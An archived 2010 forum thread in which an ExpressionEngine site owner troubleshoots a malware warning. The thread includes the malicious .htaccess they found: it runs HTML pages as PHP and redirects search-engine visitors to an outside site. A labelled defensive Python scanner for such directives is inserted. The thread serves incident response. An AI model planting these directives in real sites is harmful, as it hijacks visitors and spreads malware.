This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.


Malware attack

March 03, 2010 1:19am

  • #1 / Mar 03, 2010 1:19am

    eyeonmedia

    11 posts

    I have been developing an expression engine build on my site http://www.eyeonlinemedia.com/clients/ffi

    and am in the process of moving it to its new home… catalog.thefriendshipforce.org

    and it looks like some form of malware has infected the installation, because after clicking on a couple of links (mostly the small navigation under the main buttons) I get the browser warning that I’m attaching to this email.

    I exported the database and re-imported it to catalog.thefriendshipforce.org and the problem persists…

    please advise!

  • #2 / Mar 03, 2010 2:06am

    John Henry Donovan

    12339 posts

    eyeonmedia,

    We take security very seriously and will do our best to work with you on figuring out what’s going on. To that end, we need some additional information from you…

    The warning is from Google about another site which is the case if your site became infected recently with malware. Was there an existing site here before your new one?

    - EE version and build (found at the bottom of your control panel)
    - Other scripts on your account, whether in use or not (phpBB, etc…)

    Also, please do notify your host immediately if you haven’t done so yet. They should be able to help us determine the vector of attack.

    While we work through this, please check through these files:

      - path.php
      - config.php
      - index.php

    to ensure that there is no unusual code such as iframes or JavaScript includes; if you do find that code, then please back up the file and remove said code. If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

  • #3 / Mar 03, 2010 2:37am

    eyeonmedia

    11 posts

    I have found that a .htaccess file has been added to the root of the dir… added (not by me) a couple days ago:

    AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
    
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ive.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ing.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*news.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
    RewriteRule .* http://full-x-clips.in/in.cgi?4&parameter=u [R,L]

    I changed my password and deleted the file. I’m hoping that there is no further contamination of the expression engine install…

    I contacted my host and they think it is an isolated attack; I replied back asking for more specific information if possible.

    thanks for the quick response, and let me know what more you may think of…
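A defender-side check for the kind of .htaccess described in this thread, added here as an example and not part of any post above: it flags an AddHandler that makes .html/.htm files execute as PHP, and a RewriteRule that redirects to a foreign host, noting when the rule is gated on HTTP_REFERER conditions (the search-engine cloaking pattern). The sample input is constructed after the posted file with the redirect host replaced by a placeholder.

```python
import re

# Constructed sample modelled on the .htaccess posted in the thread;
# the real redirect host is replaced by the placeholder attacker.example.
SAMPLE_HTACCESS = """\
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://attacker.example/in.cgi?4&parameter=u [R,L]
"""

# AddHandler mapping some extensions to a PHP handler.
ADDHANDLER_PHP = re.compile(r"^\s*AddHandler\s+\S*php\S*\s+(.+)$", re.I)
# RewriteCond testing the Referer header.
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
# RewriteRule whose target is an absolute URL and whose flags include R (redirect).
EXT_REDIRECT = re.compile(
    r"^\s*RewriteRule\s+\S+\s+(https?://[^\s\]]+)\s+\[[^\]]*\bR\b", re.I)

HTML_EXTS = {".html", ".htm", ".shtml", ".shtm"}


def scan_htaccess(text, own_hosts=()):
    """Return (line_number, finding, line) tuples for suspicious directives.

    own_hosts: hostnames the site legitimately redirects to (assumed list).
    """
    findings = []
    pending_referer_conds = 0  # RewriteCond lines seen before the next RewriteRule
    for lineno, line in enumerate(text.splitlines(), 1):
        m = ADDHANDLER_PHP.match(line)
        if m and any(ext.lower() in HTML_EXTS for ext in m.group(1).split()):
            findings.append((lineno, "addhandler-php-on-html", line.strip()))
        if REFERER_COND.match(line):
            pending_referer_conds += 1
        m = EXT_REDIRECT.match(line)
        if m:
            host = m.group(1).split("/")[2].lower()
            if host not in own_hosts:
                kind = ("referer-conditional-external-redirect"
                        if pending_referer_conds else "external-redirect")
                findings.append((lineno, kind, line.strip()))
            pending_referer_conds = 0  # conditions apply only to the next rule
    return findings
```

Run it over every .htaccess under the document root (including subdirectories, since RewriteOptions inherit lets a parent file affect children) and review each finding by hand.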

  • #4 / Mar 03, 2010 3:16am

    John Henry Donovan

    12339 posts

    eyeonmedia

    Your host should be able to tell you exactly how you were attacked.
    I would also change my FTP password from a different machine and run some anti-virus on your machine to be doubly sure.

